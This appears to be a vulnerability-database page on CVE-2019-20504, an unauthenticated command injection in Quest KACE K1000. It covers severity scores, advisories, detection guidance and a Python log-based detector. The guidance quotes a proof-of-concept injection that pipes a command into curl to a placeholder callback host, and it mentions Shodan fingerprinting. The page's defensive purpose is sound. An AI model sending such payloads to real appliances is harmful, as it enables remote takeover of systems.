CVE-2019-20504
Published 2020-03-09
Priority P181 · critical · CVSS 3.1: 9.8
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 9.18% (94.7th percentile)
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| quest | kace_systems_management | < 6.4.120822 | 6.4.120822 |
Detection & IOCs (extracted from sources)
- Detect exploitation attempts by monitoring POST requests to /service/krashrpt.php containing shell metacharacters (e.g., |, ;, `, $()) in the 'kuid' parameter.
- Use an out-of-band (OOB) DNS/HTTP interaction callback to confirm blind RCE — the exploit PoC uses 'kuid=id | curl http://<interactsh-url>' and confirms exploitation via DNS interaction.
- Fingerprint vulnerable K1000 appliances exposed on the internet via Shodan using the HTML keyword 'K1000 Logo'.
- The endpoint /service/krashrpt.php is unauthenticated; any POST to this path with a 'kuid' parameter containing shell metacharacters should be treated as a high-confidence attack indicator.
- The Nuclei template uses a two-step flow: first confirming the target is a K1000 appliance (body contains 'K1000'), then sending the exploit payload. Detection logic should similarly chain host fingerprinting with payload inspection to reduce false positives.
- Exploitation is confirmed via out-of-band DNS callback (interactsh), meaning network-level egress filtering on the target appliance may prevent callback-based detection even when the vulnerability is present and exploitable.
- Affected versions are strictly before 6.4 SP3 (6.4.120822); version 6.4.120756 is explicitly cited as vulnerable. Detections should be scoped to these versions.
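One way to express the payload-inspection guidance above as log-side detection logic. This is an added example, not code from the Nuclei template or any source indexed here. It assumes the proxy or WAF log captures the request body; `classify`, `host_is_k1000` and the sample records are hypothetical names and constructed data.

```python
import re
from urllib.parse import parse_qsl, unquote, unquote_plus

TARGET_PATH = "/service/krashrpt.php"  # unauthenticated endpoint named on the page
# Metacharacters the page lists (| ; ` $( ); '&' and CR/LF are added as an assumption.
SHELL_META = re.compile(r"[|;`&\r\n]|\$\(")

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so that %253B is inspected as ';'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def kuid_values(query, body):
    """Collect every kuid value from the query string and a urlencoded body."""
    pairs = parse_qsl(query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    return [decode_fully(v) for k, v in pairs if k == "kuid"]

def classify(method, target, body="", host_is_k1000=True):
    """Return 'alert', 'review' or 'ignore' for one logged request."""
    raw_path, _, query = target.partition("?")
    path = re.sub(r"/+", "/", unquote(raw_path))  # collapse '//' and decode the path
    if path != TARGET_PATH:
        return "ignore"
    if not any(SHELL_META.search(v) for v in kuid_values(query, body)):
        return "ignore"
    # Chain the payload match with the host fingerprint, as the page advises.
    if method.upper() == "POST" and host_is_k1000:
        return "alert"
    return "review"

# Constructed sample records: (method, request target, body, host fingerprinted as K1000)
SAMPLES = [
    ("POST", "/service/krashrpt.php", "kuid=abc%7Cecho", True),
    ("POST", "/service/krashrpt.php", "kuid=0f3a9c1e-77b2", True),
    ("POST", "//service/krashrpt.php", "kuid=x%253Becho", True),
    ("POST", "/service/krashrpt.php", "kuid=x%24%28echo%29", False),
    ("GET", "/index.php", "", True),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(*sample), sample[1], sample[2])
```

Requests that match the payload pattern but arrive by another method, or at a host not fingerprinted as a K1000, are returned as `review` so they are triaged, not dropped.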
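CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | | 9.8 | CRITICAL | |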
GHSA
GHSA-j9w6-cc5g-25xw: service/krashrpt
ghsa_unreviewed·2022-05-24
CVE-2019-20504 [HIGH] GHSA-j9w6-cc5g-25xw: service/krashrpt
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
VulnCheck
quest kace_systems_management Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2019·CVSS 9.8
CVE-2019-20504 [CRITICAL] quest kace_systems_management Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
Affected: quest kace_systems_management
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-06-29&host_type=src&vulnerability=cve-2019-20504
No detection rules found.
Nuclei
Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2019-20504 [CRITICAL] Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution
service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
Template:
```yaml
id: CVE-2019-20504

info:
  name: Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands via shell metacharacters, leading to complete server compromise and access to all managed
```
No writeups or analysis indexed.